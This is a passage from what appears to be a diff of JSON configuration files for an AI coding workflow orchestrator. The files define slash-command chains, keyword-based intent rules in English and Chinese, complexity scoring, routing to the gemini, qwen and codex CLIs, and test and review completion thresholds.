"commands": ["/workflow:test-gen", "/workflow:test-fix-gen", "/workflow:test-cycle-execute"],
"agents": ["test-fix-agent"]
},
"review": {
"description": "Code review and quality analysis",
"commands": ["/workflow:review-session-cycle", "/workflow:review-module-cycle", "/workflow:review", "/workflow:review-fix"]
},
"issue": {
"description": "Issue lifecycle management - discover, accumulate, batch resolve",
"commands": ["/issue:new", "/issue:discover", "/issue:discover-by-prompt", "/issue:plan", "/issue:queue", "/issue:execute", "/issue:manage"],
"agents": ["issue-plan-agent", "issue-queue-agent", "cli-explore-agent"],
"lifecycle": {
"accumulation": {
"description": "任务完成后进行需求扩展、bug分析、测试发现",
"triggers": ["post-task review", "code review findings", "test failures"],
"commands": ["/issue:discover", "/issue:discover-by-prompt", "/issue:new"]
},
"batch_resolution": {
"description": "积累的issue集中规划和并行执行",
"flow": ["plan", "queue", "execute"],
"commands": ["/issue:plan --all-pending", "/issue:queue", "/issue:execute"]
}
}
},
"ui-design": {
"description": "UI design and prototyping",
"commands": ["/workflow:ui-design:explore-auto", "/workflow:ui-design:imitate-auto", "/workflow:ui-design:design-sync"],
"agents": ["ui-design-agent"]
},
"memory": {
"description": "Documentation and knowledge management",
"commands": ["/memory:docs", "/memory:update-related", "/memory:update-full", "/memory:skill-memory"],
"agents": ["doc-generator", "memory-bridge"]
}
},
"flows": {
"rapid": {
"name": "Rapid Iteration",
"description": "多模型协作分析 + 直接执行",
"complexity": ["low", "medium"],
"steps": [
{ "command": "/workflow:lite-plan", "optional": false, "auto_continue": true },
{ "command": "/workflow:lite-execute", "optional": false }
],
"cli_hints": {
"explore_phase": { "tool": "gemini", "mode": "analysis", "trigger": "needs_exploration" },
"execution": { "tool": "codex", "mode": "write", "trigger": "complexity >= medium" }
},
"estimated_time": "15-45 min"
},
"full": {
"name": "Full Exploration",
"description": "头脑风暴 + 规划 + 执行",
"complexity": ["medium", "high"],
"steps": [
{ "command": "/workflow:brainstorm:auto-parallel", "optional": false, "confirm_before": true },
{ "command": "/workflow:plan", "optional": false },
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
{ "command": "/workflow:execute", "optional": false }
],
"cli_hints": {
"role_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
"execution": { "tool": "codex", "mode": "write", "trigger": "task_count >= 3" }
},
"estimated_time": "1-3 hours"
},
"coupled": {
"name": "Coupled Planning",
"description": "完整规划 + 验证 + 执行",
"complexity": ["high"],
"steps": [
{ "command": "/workflow:plan", "optional": false },
{ "command": "/workflow:action-plan-verify", "optional": false, "auto_continue": true },
{ "command": "/workflow:execute", "optional": false },
{ "command": "/workflow:review", "optional": true }
],
"cli_hints": {
"pre_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
"execution": { "tool": "codex", "mode": "write", "trigger": "always" }
},
"estimated_time": "2-4 hours"
},
"bugfix": {
"name": "Bug Fix",
"description": "智能诊断 + 修复",
"complexity": ["low", "medium"],
"variants": {
"standard": [{ "command": "/workflow:lite-fix", "optional": false }],
"hotfix": [{ "command": "/workflow:lite-fix --hotfix", "optional": false }]
},
"cli_hints": {
"diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
"fix": { "tool": "codex", "mode": "write", "trigger": "severity >= medium" }
},
"estimated_time": "10-30 min"
},
"issue": {
"name": "Issue Lifecycle",
"description": "发现积累 → 批量规划 → 队列优化 → 并行执行",
"complexity": ["medium", "high"],
"phases": {
"accumulation": {
"description": "项目迭代中持续发现和积累issue",
"commands": ["/issue:discover", "/issue:new"],
"trigger": "post-task, code-review, test-failure"
},
"resolution": {
"description": "集中规划和执行积累的issue",
"steps": [
{ "command": "/issue:plan --all-pending", "optional": false },
{ "command": "/issue:queue", "optional": false },
{ "command": "/issue:execute", "optional": false }
]
}
},
"cli_hints": {
"discovery": { "tool": "gemini", "mode": "analysis", "trigger": "perspective_analysis", "parallel": true },
"solution_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
"batch_execution": { "tool": "codex", "mode": "write", "trigger": "always" }
},
"estimated_time": "1-4 hours"
},
"lite-lite-lite": {
"name": "Ultra-Lite Multi-CLI",
"description": "零文件 + 自动CLI选择 + 语义描述 + 直接执行",
"complexity": ["low", "medium"],
"steps": [
{ "phase": "clarify", "description": "需求澄清 (AskUser if needed)" },
{ "phase": "auto-select", "description": "任务分析 → 自动选择CLI组合" },
{ "phase": "multi-cli", "description": "并行多CLI分析" },
{ "phase": "decision", "description": "展示结果 → AskUser决策" },
{ "phase": "execute", "description": "直接执行 (无中间文件)" }
],
"vs_multi_cli_plan": {
"artifacts": "None vs IMPL_PLAN.md + plan.json + synthesis.json",
"session": "Stateless vs Persistent",
"cli_selection": "Auto-select based on task analysis vs Config-driven",
"iteration": "Via AskUser vs Via rounds/synthesis",
"execution": "Direct vs Via lite-execute",
"best_for": "Quick fixes, simple features vs Complex multi-step implementations"
},
"cli_hints": {
"analysis": { "tool": "auto", "mode": "analysis", "parallel": true },
"execution": { "tool": "auto", "mode": "write" }
},
"estimated_time": "10-30 min"
},
"multi-cli-plan": {
"name": "Multi-CLI Collaborative Planning",
"description": "ACE上下文 + 多CLI协作分析 + 迭代收敛 + 计划生成",
"complexity": ["medium", "high"],
"steps": [
{ "command": "/workflow:multi-cli-plan", "optional": false, "phases": [
"context_gathering: ACE语义搜索",
"multi_cli_discussion: cli-discuss-agent多轮分析",
"present_options: 展示解决方案",
"user_decision: 用户选择",
"plan_generation: cli-lite-planning-agent生成计划"
]},
{ "command": "/workflow:lite-execute", "optional": false }
],
"vs_lite_plan": {
"context": "ACE semantic search vs Manual file patterns",
"analysis": "Multi-CLI cross-verification vs Single-pass planning",
"iteration": "Multiple rounds until convergence vs Single round",
"confidence": "High (consensus-based) vs Medium (single perspective)",
"best_for": "Complex tasks needing multiple perspectives vs Straightforward implementations"
},
"agents": ["cli-discuss-agent", "cli-lite-planning-agent"],
"cli_hints": {
"discussion": { "tools": ["gemini", "codex", "claude"], "mode": "analysis", "parallel": true },
"planning": { "tool": "gemini", "mode": "analysis" }
},
"output": ".workflow/.multi-cli-plan/{session-id}/",
"estimated_time": "30-90 min"
},
"tdd": {
"name": "Test-Driven Development",
"description": "TDD规划 + 执行 + 验证",
"complexity": ["medium", "high"],
"steps": [
{ "command": "/workflow:tdd-plan", "optional": false },
{ "command": "/workflow:execute", "optional": false },
{ "command": "/workflow:tdd-verify", "optional": false }
],
"cli_hints": {
"test_strategy": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
"red_green_refactor": { "tool": "codex", "mode": "write", "trigger": "always" }
},
"estimated_time": "1-3 hours"
},
"ui": {
"name": "UI-First Development",
"description": "UI设计 + 规划 + 执行",
"complexity": ["medium", "high"],
"variants": {
"explore": [
{ "command": "/workflow:ui-design:explore-auto", "optional": false },
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
{ "command": "/workflow:plan", "optional": false },
{ "command": "/workflow:execute", "optional": false }
],
"imitate": [
{ "command": "/workflow:ui-design:imitate-auto", "optional": false },
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
{ "command": "/workflow:plan", "optional": false },
{ "command": "/workflow:execute", "optional": false }
]
},
"estimated_time": "2-4 hours"
},
"review-fix": {
"name": "Review and Fix",
"description": "多维审查 + 自动修复",
"complexity": ["medium"],
"steps": [
{ "command": "/workflow:review-session-cycle", "optional": false },
{ "command": "/workflow:review-fix", "optional": true }
],
"cli_hints": {
"multi_dimension_review": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
"auto_fix": { "tool": "codex", "mode": "write", "trigger": "findings_count >= 3" }
},
"estimated_time": "30-90 min"
},
"docs": {
"name": "Documentation",
"description": "批量文档生成",
"complexity": ["low", "medium"],
"variants": {
"incremental": [{ "command": "/memory:update-related", "optional": false }],
"full": [
{ "command": "/memory:docs", "optional": false },
{ "command": "/workflow:execute", "optional": false }
]
},
"estimated_time": "15-60 min"
}
},
"intent_rules": {
"bugfix": {
"priority": 1,
"variants": {
"hotfix": {
"patterns": ["hotfix", "urgent", "production", "critical", "emergency", "紧急", "生产环境", "线上"],
"flow": "bugfix.hotfix"
},
"standard": {
"patterns": ["fix", "bug", "error", "issue", "crash", "broken", "fail", "wrong", "修复", "错误", "崩溃"],
"flow": "bugfix.standard"
}
}
},
"issue_batch": {
"priority": 2,
"patterns": {
"batch": ["issues", "batch", "queue", "多个", "批量"],
"action": ["fix", "resolve", "处理", "解决"]
},
"require_both": true,
"flow": "issue"
},
"exploration": {
"priority": 3,
"patterns": ["不确定", "不知道", "explore", "研究", "分析一下", "怎么做", "what if", "探索"],
"flow": "full"
},
"ui_design": {
"priority": 4,
"patterns": ["ui", "界面", "design", "设计", "component", "组件", "style", "样式", "layout", "布局"],
"variants": {
"imitate": { "triggers": ["参考", "模仿", "像", "类似"], "flow": "ui.imitate" },
"explore": { "triggers": [], "flow": "ui.explore" }
}
},
"tdd": {
"priority": 5,
"patterns": ["tdd", "test-driven", "测试驱动", "先写测试", "test first"],
"flow": "tdd"
},
"review": {
"priority": 6,
"patterns": ["review", "审查", "检查代码", "code review", "质量检查"],
"flow": "review-fix"
},
"documentation": {
"priority": 7,
"patterns": ["文档", "documentation", "docs", "readme"],
"variants": {
"incremental": { "triggers": ["更新", "增量"], "flow": "docs.incremental" },
"full": { "triggers": ["全部", "完整"], "flow": "docs.full" }
}
},
"feature": {
"priority": 99,
"complexity_map": {
"high": "coupled",
"medium": "rapid",
"low": "rapid"
}
}
},
"complexity_indicators": {
"high": {
"threshold": 4,
"patterns": {
"architecture": { "keywords": ["refactor", "重构", "migrate", "迁移", "architect", "架构", "system", "系统"], "weight": 2 },
"multi_module": { "keywords": ["multiple", "多个", "across", "跨", "all", "所有", "entire", "整个"], "weight": 2 },
"integration": { "keywords": ["integrate", "集成", "api", "database", "数据库"], "weight": 1 },
"quality": { "keywords": ["security", "安全", "performance", "性能", "scale", "扩展"], "weight": 1 }
}
},
"medium": { "threshold": 2 },
"low": { "threshold": 0 }
},
"cli_tools": {
"gemini": {
"strengths": ["超长上下文", "深度分析", "架构理解", "执行流追踪"],
"triggers": ["分析", "理解", "设计", "架构", "诊断"],
"mode": "analysis"
},
"qwen": {
"strengths": ["代码模式识别", "多维度分析"],
"triggers": ["评估", "对比", "验证"],
"mode": "analysis"
},
"codex": {
"strengths": ["精确代码生成", "自主执行"],
"triggers": ["实现", "重构", "修复", "生成"],
"mode": "write"
}
},
"cli_injection_rules": {
"context_gathering": { "trigger": "file_read >= 50k OR module_count >= 5", "inject": "gemini --mode analysis" },
"pre_planning_analysis": { "trigger": "complexity === high", "inject": "gemini --mode analysis" },
"debug_diagnosis": { "trigger": "intent === bugfix AND root_cause_unclear", "inject": "gemini --mode analysis" },
"code_review": { "trigger": "step === review", "inject": "gemini --mode analysis" },
"implementation": { "trigger": "step === execute AND task_count >= 3", "inject": "codex --mode write" }
},
"artifact_flow": {
"_description": "定义工作流产出的格式、意图提取和流转规则",
"outputs": {
"/workflow:lite-plan": {
"artifact": "memory://plan",
"format": "structured_plan",
"fields": ["tasks", "files", "dependencies", "approach"]
},
"/workflow:plan": {
"artifact": ".workflow/{session}/IMPL_PLAN.md",
"format": "markdown_plan",
"fields": ["phases", "tasks", "dependencies", "risks", "test_strategy"]
},
"/workflow:multi-cli-plan": {
"artifact": ".workflow/.multi-cli-plan/{session}/",
"format": "multi_file",
"files": ["IMPL_PLAN.md", "plan.json", "synthesis.json"],
"fields": ["consensus", "divergences", "recommended_approach", "tasks"]
},
"/workflow:lite-execute": {
"artifact": "git_changes",
"format": "code_diff",
"fields": ["modified_files", "added_files", "deleted_files", "build_status"]
},
"/workflow:execute": {
"artifact": ".workflow/{session}/execution_log.json",
"format": "execution_report",
"fields": ["completed_tasks", "pending_tasks", "errors", "warnings"]
},
"/workflow:test-cycle-execute": {
"artifact": ".workflow/{session}/test_results.json",
"format": "test_report",
"fields": ["pass_rate", "failures", "coverage", "duration"]
},
"/workflow:review-session-cycle": {
"artifact": ".workflow/{session}/review_report.md",
"format": "review_report",
"fields": ["findings", "severity_counts", "recommendations"]
},
"/workflow:lite-fix": {
"artifact": "git_changes",
"format": "fix_report",
"fields": ["root_cause", "fix_applied", "files_modified", "verification_status"]
}
},
"intent_extraction": {
"plan_to_execute": {
"from": ["lite-plan", "plan", "multi-cli-plan"],
"to": ["lite-execute", "execute"],
"extract": {
"tasks": "$.tasks[] | filter(status != 'completed')",
"priority_order": "$.tasks | sort_by(priority)",
"files_to_modify": "$.tasks[].files | flatten | unique",
"dependencies": "$.dependencies",
"context_summary": "$.approach OR $.recommended_approach"
}
},
"execute_to_test": {
"from": ["lite-execute", "execute"],
"to": ["test-cycle-execute", "test-fix-gen"],
"extract": {
"modified_files": "$.modified_files",
"test_scope": "infer_from($.modified_files)",
"build_status": "$.build_status",
"pending_verification": "$.completed_tasks | needs_test"
}
},
"test_to_fix": {
"from": ["test-cycle-execute"],
"to": ["lite-fix", "review-fix"],
"condition": "$.pass_rate < 0.95",
"extract": {
"failures": "$.failures",
"error_messages": "$.failures[].message",
"affected_files": "$.failures[].file",
"suggested_fixes": "$.failures[].suggested_fix"
}
},
"review_to_fix": {
"from": ["review-session-cycle", "review-module-cycle"],
"to": ["review-fix"],
"condition": "$.severity_counts.critical > 0 OR $.severity_counts.high > 3",
"extract": {
"findings": "$.findings | filter(severity in ['critical', 'high'])",
"fix_priority": "$.findings | group_by(category) | sort_by(severity)",
"affected_files": "$.findings[].file | unique"
}
}
},
"completion_criteria": {
"plan": {
"required": ["has_tasks", "has_files"],
"optional": ["has_tests", "no_blocking_risks"],
"threshold": 0.8,
"routing": {
"complete": "proceed_to_execute",
"incomplete": "clarify_requirements"
}
},
"execute": {
"required": ["all_tasks_attempted", "no_critical_errors"],
"optional": ["build_passes", "lint_passes"],
"threshold": 1.0,
"routing": {
"complete": "proceed_to_test_or_review",
"partial": "continue_execution",
"failed": "diagnose_and_retry"
}
},
"test": {
"metrics": {
"pass_rate": { "target": 0.95, "minimum": 0.80 },
"coverage": { "target": 0.80, "minimum": 0.60 }
},
"routing": {
"pass_rate >= 0.95 AND coverage >= 0.80": "complete",
"pass_rate >= 0.95 AND coverage < 0.80": "add_more_tests",
"pass_rate >= 0.80": "fix_failures_then_continue",
"pass_rate < 0.80": "major_fix_required"
}
},
"review": {
"metrics": {
"critical_findings": { "target": 0, "maximum": 0 },
"high_findings": { "target": 0, "maximum": 3 }
},
"routing": {
"critical == 0 AND high <= 3": "complete_or_optional_fix",
"critical > 0": "mandatory_fix",
"high > 3": "recommended_fix"
}
}
},
"flow_decisions": {
"_description": "根据产出完成度决定下一步",
"patterns": {
"plan_execute_test": {
"sequence": ["plan", "execute", "test"],
"on_test_fail": {
"action": "extract_failures_and_fix",
"max_iterations": 3,
"fallback": "manual_intervention"
}
},
"plan_execute_review": {
"sequence": ["plan", "execute", "review"],
"on_review_issues": {
"action": "prioritize_and_fix",
"auto_fix_threshold": "severity < high"
}
},
"iterative_improvement": {
"sequence": ["execute", "test", "fix"],
"loop_until": "pass_rate >= 0.95 OR iterations >= 3",
"on_loop_exit": "report_status"
}
}
}
}
}

View File

@@ -1,127 +0,0 @@
{
"_metadata": {
"version": "1.0.0",
"generated": "2026-01-03",
"description": "CCW command capability index for intelligent workflow coordination"
},
"capabilities": {
"explore": {
"description": "Codebase exploration and context gathering",
"commands": [
{ "command": "/workflow:init", "weight": 1.0, "tags": ["project-setup", "context"] },
{ "command": "/workflow:tools:gather", "weight": 0.9, "tags": ["context", "analysis"] },
{ "command": "/memory:load", "weight": 0.8, "tags": ["context", "memory"] }
],
"agents": ["cli-explore-agent", "context-search-agent"]
},
"brainstorm": {
"description": "Multi-perspective analysis and ideation",
"commands": [
{ "command": "/workflow:brainstorm:auto-parallel", "weight": 1.0, "tags": ["exploration", "multi-role"] },
{ "command": "/workflow:brainstorm:artifacts", "weight": 0.9, "tags": ["clarification", "guidance"] },
{ "command": "/workflow:brainstorm:synthesis", "weight": 0.8, "tags": ["consolidation", "refinement"] }
],
"roles": ["product-manager", "system-architect", "ux-expert", "data-architect", "api-designer"]
},
"plan": {
"description": "Task planning and decomposition",
"commands": [
{ "command": "/workflow:lite-plan", "weight": 1.0, "complexity": "low-medium", "tags": ["fast", "interactive"] },
{ "command": "/workflow:plan", "weight": 0.9, "complexity": "medium-high", "tags": ["comprehensive", "persistent"] },
{ "command": "/workflow:tdd-plan", "weight": 0.7, "complexity": "medium-high", "tags": ["test-first", "quality"] },
{ "command": "/task:create", "weight": 0.6, "tags": ["single-task", "manual"] },
{ "command": "/task:breakdown", "weight": 0.5, "tags": ["decomposition", "subtasks"] }
],
"agents": ["cli-lite-planning-agent", "action-planning-agent"]
},
"verify": {
"description": "Plan and quality verification",
"commands": [
{ "command": "/workflow:action-plan-verify", "weight": 1.0, "tags": ["plan-quality", "consistency"] },
{ "command": "/workflow:tdd-verify", "weight": 0.8, "tags": ["tdd-compliance", "coverage"] }
]
},
"execute": {
"description": "Task execution and implementation",
"commands": [
{ "command": "/workflow:lite-execute", "weight": 1.0, "complexity": "low-medium", "tags": ["fast", "agent-or-cli"] },
{ "command": "/workflow:execute", "weight": 0.9, "complexity": "medium-high", "tags": ["dag-parallel", "comprehensive"] },
{ "command": "/task:execute", "weight": 0.7, "tags": ["single-task"] }
],
"agents": ["code-developer", "cli-execution-agent", "universal-executor"]
},
"bugfix": {
"description": "Bug diagnosis and fixing",
"commands": [
{ "command": "/workflow:lite-fix", "weight": 1.0, "tags": ["diagnosis", "fix", "standard"] },
{ "command": "/workflow:lite-fix --hotfix", "weight": 0.9, "tags": ["emergency", "production", "fast"] }
],
"agents": ["code-developer"]
},
"test": {
"description": "Test generation and execution",
"commands": [
{ "command": "/workflow:test-gen", "weight": 1.0, "tags": ["post-implementation", "coverage"] },
{ "command": "/workflow:test-fix-gen", "weight": 0.9, "tags": ["from-description", "flexible"] },
{ "command": "/workflow:test-cycle-execute", "weight": 0.8, "tags": ["iterative", "fix-cycle"] }
],
"agents": ["test-fix-agent"]
},
"review": {
"description": "Code review and quality analysis",
"commands": [
{ "command": "/workflow:review-session-cycle", "weight": 1.0, "tags": ["session-based", "comprehensive"] },
{ "command": "/workflow:review-module-cycle", "weight": 0.9, "tags": ["module-based", "targeted"] },
{ "command": "/workflow:review", "weight": 0.8, "tags": ["single-pass", "type-specific"] },
{ "command": "/workflow:review-fix", "weight": 0.7, "tags": ["auto-fix", "findings"] }
]
},
"issue": {
"description": "Batch issue management",
"commands": [
{ "command": "/issue:new", "weight": 1.0, "tags": ["create", "import"] },
{ "command": "/issue:discover", "weight": 0.9, "tags": ["find", "analyze"] },
{ "command": "/issue:plan", "weight": 0.8, "tags": ["solutions", "planning"] },
{ "command": "/issue:queue", "weight": 0.7, "tags": ["prioritize", "order"] },
{ "command": "/issue:execute", "weight": 0.6, "tags": ["batch-execute", "dag"] }
],
"agents": ["issue-plan-agent", "issue-queue-agent"]
},
"ui-design": {
"description": "UI design and prototyping",
"commands": [
{ "command": "/workflow:ui-design:explore-auto", "weight": 1.0, "tags": ["from-scratch", "variants"] },
{ "command": "/workflow:ui-design:imitate-auto", "weight": 0.9, "tags": ["reference-based", "copy"] },
{ "command": "/workflow:ui-design:design-sync", "weight": 0.7, "tags": ["sync", "finalize"] },
{ "command": "/workflow:ui-design:generate", "weight": 0.6, "tags": ["assemble", "prototype"] }
],
"agents": ["ui-design-agent"]
},
"memory": {
"description": "Documentation and knowledge management",
"commands": [
{ "command": "/memory:docs", "weight": 1.0, "tags": ["generate", "planning"] },
{ "command": "/memory:update-related", "weight": 0.9, "tags": ["incremental", "git-based"] },
{ "command": "/memory:update-full", "weight": 0.8, "tags": ["comprehensive", "all-modules"] },
{ "command": "/memory:skill-memory", "weight": 0.7, "tags": ["package", "reusable"] }
],
"agents": ["doc-generator", "memory-bridge"]
},
"session": {
"description": "Workflow session management",
"commands": [
{ "command": "/workflow:session:start", "weight": 1.0, "tags": ["init", "discover"] },
{ "command": "/workflow:session:list", "weight": 0.9, "tags": ["view", "status"] },
{ "command": "/workflow:session:resume", "weight": 0.8, "tags": ["continue", "restore"] },
{ "command": "/workflow:session:complete", "weight": 0.7, "tags": ["finish", "archive"] }
]
},
"debug": {
"description": "Debugging and problem solving",
"commands": [
{ "command": "/workflow:debug", "weight": 1.0, "tags": ["hypothesis", "iterative"] },
{ "command": "/workflow:clean", "weight": 0.6, "tags": ["cleanup", "artifacts"] }
]
}
}
}

View File

@@ -1,136 +0,0 @@
{
"_metadata": {
"version": "1.0.0",
"description": "Externalized intent classification rules for CCW orchestrator"
},
"intent_patterns": {
"bugfix": {
"priority": 1,
"description": "Bug修复意图",
"variants": {
"hotfix": {
"patterns": ["hotfix", "urgent", "production", "critical", "emergency", "紧急", "生产环境", "线上"],
"workflow": "lite-fix --hotfix"
},
"standard": {
"patterns": ["fix", "bug", "error", "issue", "crash", "broken", "fail", "wrong", "incorrect", "修复", "错误", "崩溃", "失败"],
"workflow": "lite-fix"
}
}
},
"issue_batch": {
"priority": 2,
"description": "批量Issue处理意图",
"patterns": {
"batch_keywords": ["issues", "issue", "batch", "queue", "多个", "批量", "一批"],
"action_keywords": ["fix", "resolve", "处理", "解决", "修复"]
},
"require_both": true,
"workflow": "issue:plan → issue:queue → issue:execute"
},
"exploration": {
"priority": 3,
"description": "探索/不确定意图",
"patterns": ["不确定", "不知道", "explore", "研究", "分析一下", "怎么做", "what if", "should i", "探索", "可能", "或许", "建议"],
"workflow": "brainstorm → plan → execute"
},
"ui_design": {
"priority": 4,
"description": "UI/设计意图",
"patterns": ["ui", "界面", "design", "设计", "component", "组件", "style", "样式", "layout", "布局", "前端", "frontend", "页面"],
"variants": {
"imitate": {
"triggers": ["参考", "模仿", "像", "类似", "reference", "like"],
"workflow": "ui-design:imitate-auto → plan → execute"
},
"explore": {
"triggers": [],
"workflow": "ui-design:explore-auto → plan → execute"
}
}
},
"tdd": {
"priority": 5,
"description": "测试驱动开发意图",
"patterns": ["tdd", "test-driven", "测试驱动", "先写测试", "red-green", "test first"],
"workflow": "tdd-plan → execute → tdd-verify"
},
"review": {
"priority": 6,
"description": "代码审查意图",
"patterns": ["review", "审查", "检查代码", "code review", "质量检查", "安全审查"],
"workflow": "review-session-cycle → review-fix"
},
"documentation": {
"priority": 7,
"description": "文档生成意图",
"patterns": ["文档", "documentation", "docs", "readme", "注释", "api doc", "说明"],
"variants": {
"incremental": {
"triggers": ["更新", "增量", "相关"],
"workflow": "memory:update-related"
},
"full": {
"triggers": ["全部", "完整", "所有"],
"workflow": "memory:docs → execute"
}
}
}
},
"complexity_indicators": {
"high": {
"score_threshold": 4,
"patterns": {
"architecture": {
"keywords": ["refactor", "重构", "migrate", "迁移", "architect", "架构", "system", "系统"],
"weight": 2
},
"multi_module": {
"keywords": ["multiple", "多个", "across", "跨", "all", "所有", "entire", "整个"],
"weight": 2
},
"integration": {
"keywords": ["integrate", "集成", "connect", "连接", "api", "database", "数据库"],
"weight": 1
},
"quality": {
"keywords": ["security", "安全", "performance", "性能", "scale", "扩展", "优化"],
"weight": 1
}
},
"workflow": "plan → verify → execute"
},
"medium": {
"score_threshold": 2,
"workflow": "lite-plan → lite-execute"
},
"low": {
"score_threshold": 0,
"workflow": "lite-plan → lite-execute"
}
},
"cli_tool_triggers": {
"gemini": {
"explicit": ["用 gemini", "gemini 分析", "让 gemini", "用gemini"],
"semantic": ["深度分析", "架构理解", "执行流追踪", "根因分析"]
},
"qwen": {
"explicit": ["用 qwen", "qwen 评估", "让 qwen", "用qwen"],
"semantic": ["第二视角", "对比验证", "模式识别"]
},
"codex": {
"explicit": ["用 codex", "codex 实现", "让 codex", "用codex"],
"semantic": ["自主完成", "批量修改", "自动实现"]
}
},
"fallback_rules": {
"no_match": {
"default_workflow": "lite-plan → lite-execute",
"use_complexity_assessment": true
},
"ambiguous": {
"action": "ask_user",
"message": "检测到多个可能意图,请确认工作流选择"
}
}
}

View File

@@ -1,451 +0,0 @@
{
"_metadata": {
"version": "1.1.0",
"description": "Predefined workflow chains with CLI tool integration for CCW orchestration"
},
"cli_tools": {
"_doc": "CLI工具是CCW的核心能力在合适时机自动调用以获得1)较少token获取大量上下文 2)引入不同模型视角 3)增强debug和规划能力",
"gemini": {
"strengths": ["超长上下文", "深度分析", "架构理解", "执行流追踪"],
"triggers": ["分析", "理解", "设计", "架构", "评估", "诊断"],
"mode": "analysis",
"token_efficiency": "high",
"use_when": [
"需要理解大型代码库结构",
"执行流追踪和数据流分析",
"架构设计和技术方案评估",
"复杂问题诊断root cause analysis"
]
},
"qwen": {
"strengths": ["超长上下文", "代码模式识别", "多维度分析"],
"triggers": ["评估", "对比", "验证"],
"mode": "analysis",
"token_efficiency": "high",
"use_when": [
"Gemini 不可用时作为备选",
"需要第二视角验证分析结果",
"代码模式识别和重复检测"
]
},
"codex": {
"strengths": ["精确代码生成", "自主执行", "数学推理"],
"triggers": ["实现", "重构", "修复", "生成", "测试"],
"mode": "write",
"token_efficiency": "medium",
"use_when": [
"需要自主完成多步骤代码修改",
"复杂重构和迁移任务",
"测试生成和修复循环"
]
}
},
"cli_injection_rules": {
"_doc": "隐式规则在特定条件下自动注入CLI调用",
"context_gathering": {
"trigger": "file_read >= 50k chars OR module_count >= 5",
"inject": "gemini --mode analysis",
"reason": "大量代码上下文使用CLI可节省主会话token"
},
"pre_planning_analysis": {
"trigger": "complexity === 'high' OR intent === 'exploration'",
"inject": "gemini --mode analysis",
"reason": "复杂任务先用CLI分析获取多模型视角"
},
"debug_diagnosis": {
"trigger": "intent === 'bugfix' AND root_cause_unclear",
"inject": "gemini --mode analysis",
"reason": "深度诊断利用Gemini的执行流追踪能力"
},
"code_review": {
"trigger": "step === 'review'",
"inject": "gemini --mode analysis",
"reason": "代码审查用CLI减少token占用"
},
"implementation": {
"trigger": "step === 'execute' AND task_count >= 3",
"inject": "codex --mode write",
"reason": "多任务执行用Codex自主完成"
}
},
"chains": {
"rapid": {
"name": "Rapid Iteration",
"description": "多模型协作分析 + 直接执行",
"complexity": ["low", "medium"],
"steps": [
{
"command": "/workflow:lite-plan",
"optional": false,
"auto_continue": true,
"cli_hint": {
"explore_phase": { "tool": "gemini", "mode": "analysis", "trigger": "needs_exploration" },
"planning_phase": { "tool": "gemini", "mode": "analysis", "trigger": "complexity >= medium" }
}
},
{
"command": "/workflow:lite-execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"execution": { "tool": "codex", "mode": "write", "trigger": "user_selects_codex OR complexity >= medium" },
"review": { "tool": "gemini", "mode": "analysis", "trigger": "user_selects_review" }
}
}
],
"total_steps": 2,
"estimated_time": "15-45 min"
},
"full": {
"name": "Full Exploration",
"description": "多模型深度分析 + 头脑风暴 + 规划 + 执行",
"complexity": ["medium", "high"],
"steps": [
{
"command": "/workflow:brainstorm:auto-parallel",
"optional": false,
"confirm_before": true,
"cli_hint": {
"role_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
}
},
{
"command": "/workflow:plan",
"optional": false,
"auto_continue": false,
"cli_hint": {
"context_gather": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
"task_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
},
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
{
"command": "/workflow:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"execution": { "tool": "codex", "mode": "write", "trigger": "task_count >= 3" }
}
}
],
"total_steps": 4,
"estimated_time": "1-3 hours"
},
"coupled": {
"name": "Coupled Planning",
"description": "CLI深度分析 + 完整规划 + 验证 + 执行",
"complexity": ["high"],
"steps": [
{
"command": "/workflow:plan",
"optional": false,
"auto_continue": false,
"cli_hint": {
"pre_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "purpose": "架构理解和依赖分析" },
"conflict_detection": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
},
{ "command": "/workflow:action-plan-verify", "optional": false, "auto_continue": true },
{
"command": "/workflow:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"execution": { "tool": "codex", "mode": "write", "trigger": "always", "purpose": "自主多任务执行" }
}
},
{
"command": "/workflow:review",
"optional": true,
"auto_continue": false,
"cli_hint": {
"review": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
}
],
"total_steps": 4,
"estimated_time": "2-4 hours"
},
"bugfix": {
"name": "Bug Fix",
"description": "CLI诊断 + 智能修复",
"complexity": ["low", "medium"],
"variants": {
"standard": {
"steps": [
{
"command": "/workflow:lite-fix",
"optional": false,
"auto_continue": true,
"cli_hint": {
"diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "purpose": "根因分析和执行流追踪" },
"fix": { "tool": "codex", "mode": "write", "trigger": "severity >= medium" }
}
}
]
},
"hotfix": {
"steps": [
{
"command": "/workflow:lite-fix --hotfix",
"optional": false,
"auto_continue": true,
"cli_hint": {
"quick_diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "timeout": "60s" }
}
}
]
}
},
"total_steps": 1,
"estimated_time": "10-30 min"
},
"issue": {
"name": "Issue Batch",
"description": "CLI批量分析 + 队列优化 + 并行执行",
"complexity": ["medium", "high"],
"steps": [
{
"command": "/issue:plan",
"optional": false,
"auto_continue": false,
"cli_hint": {
"solution_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
}
},
{
"command": "/issue:queue",
"optional": false,
"auto_continue": false,
"cli_hint": {
"conflict_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "issue_count >= 3" }
}
},
{
"command": "/issue:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
